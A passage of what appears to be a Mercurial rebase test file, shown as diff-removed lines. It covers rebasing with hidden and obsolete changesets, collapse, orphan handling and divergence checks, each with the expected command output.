11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . - rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. - -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. - - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. - - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. - - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" - $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c - | - | * 4:76be324c128b d - | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ cd .. - -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / 